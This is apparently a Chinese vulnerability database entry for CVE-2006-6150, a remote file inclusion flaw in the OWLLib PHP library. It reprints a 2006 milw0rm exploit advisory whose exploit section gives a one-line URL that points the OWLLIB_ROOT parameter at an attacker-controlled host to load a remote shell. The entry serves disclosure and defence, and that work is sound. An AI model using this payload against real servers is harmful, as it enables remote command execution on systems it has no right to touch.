OWLLib OWLLIB_ROOT参数文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111646 漏洞类型 输入验证
发布时间 2006-11-23 更新时间 2006-11-29
CVE编号 CVE-2006-6150 CNNVD-ID CNNVD-200611-447
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2839
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-447
|漏洞详情
OWLLib是用于访问OWL文件的PHP函数库。OWLLib在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。OWLLib的owllib/memory/OWLMemoryProperty.php文件中没有正确验证OWLLIB_ROOT参数的输入,允许攻击者通过包含本地或外部资源任意文件导致执行任意指令。漏洞相关代码如下:require_once"$OWLLIB_ROOT/OWLProperty.php";require_once"$OWLLIB_ROOT/memory/OWLMemoryClass.php";成功攻击要求打开了register_globals。
|漏洞EXP
**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name : owllib-src-1.0

* Class = Remote File Inclusion ;
 
* Download =http://heanet.dl.sourceforge.net/sourceforge/phpowllib/owllib-src-1.0.zip

* Found by = DeltahackingTEAM

* User In Delta Team (Dr.Pantagon )

* With the special  thanks of my financial sponser Tanha
----------------------------------------------------------------------------------------------------------
- Vulnerable Code

require_once "$OWLLIB_ROOT/OWLProperty.php";
require_once "$OWLLIB_ROOT/memory/OWLMemoryClass.php";
++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

    http://[target]/[path]/owllib/memory/OWLMemoryProperty.php?OWLLIB_ROOT=http://evilsite.com/shell?

***********************
I LOVE YOU G.Malake
***********************
----------------------------------------------------------------------------------------------------------
Greetz:Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc

# milw0rm.com [2006-11-23]
|参考资料

来源:MILW0RM
名称:2839
链接:http://www.milw0rm.com/exploits/2839
来源:VUPEN
名称:ADV-2006-4690
链接:http://www.frsirt.com/english/advisories/2006/4690
来源:SECUNIA
名称:23079
链接:http://secunia.com/advisories/23079
来源:XF
名称:owllib-owlmemoryproperty-file-include(30531)
链接:http://xforce.iss.net/xforce/xfdb/30531
来源:BID
名称:21268
链接:http://www.securityfocus.com/bid/21268
来源:MILW0RM
名称:2839
链接:http://milw0rm.com/exploits/2839